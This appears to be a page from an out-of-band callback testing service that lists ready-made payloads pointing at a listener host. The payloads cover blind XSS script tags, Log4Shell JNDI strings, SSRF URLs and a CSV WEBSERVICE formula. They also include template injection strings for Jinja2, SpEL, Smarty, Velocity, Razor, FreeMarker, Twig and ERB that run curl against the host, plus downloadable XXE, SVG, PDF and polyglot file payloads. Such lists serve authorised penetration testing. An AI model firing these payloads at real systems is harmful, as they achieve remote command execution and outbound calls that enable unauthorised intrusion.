basic
inject
📁 File Payloads
ssti
HTTP / HTTPS
https://cntasrvf.pingback.sh/
DNS
cntasrvf.pingback.sh
Blind XSS
"><script src=//cntasrvf.pingback.sh/x></script>
SMTP
anything@cntasrvf.pingback.sh
Log4Shell JNDI
${jndi:ldap://cntasrvf.pingback.sh/a}
Log4Shell DNS
${jndi:dns://cntasrvf.pingback.sh/a}
SSRF
http://cntasrvf.pingback.sh/ssrf
CSV injection
=WEBSERVICE("https://cntasrvf.pingback.sh/csv")
XSS img onerror
"><img src=x onerror="…//cntasrvf.pingback.sh/x…">
Click to download — upload to trigger OOB callback
SVG (HTTP callback)
payload.svg
SVG + XSS
payload-xss.svg
XML (XXE)
payload.xml
DTD (XXE OOB)
payload.dtd
PDF (SSRF on render)
payload.pdf
HTML (iframe)
payload.html
PNG polyglot
payload.png
Each payload triggers an HTTP callback to your listener if evaluated
Jinja2 (Python)
{{…popen('curl https://cntasrvf.pingback.sh/j2')…}}
SpEL / Spring
*{T(Runtime).exec('curl https://cntasrvf.pingback.sh/spel')}
Smarty (PHP)
{system('curl https://cntasrvf.pingback.sh/smarty')}
Velocity (Java)
#set($x=$Runtime.exec('curl https://cntasrvf.pingback.sh/vel'))
Razor (.NET)
@(Process.Start('curl','https://cntasrvf.pingback.sh/razor'))
FreeMarker (Java)
<#assign ex=…>${ex('curl https://cntasrvf.pingback.sh/ftl')}
Twig (PHP)
{%set x=…popen('curl https://cntasrvf.pingback.sh/twig')%}
ERB (Ruby)
<%= `curl https://cntasrvf.pingback.sh/erb` %>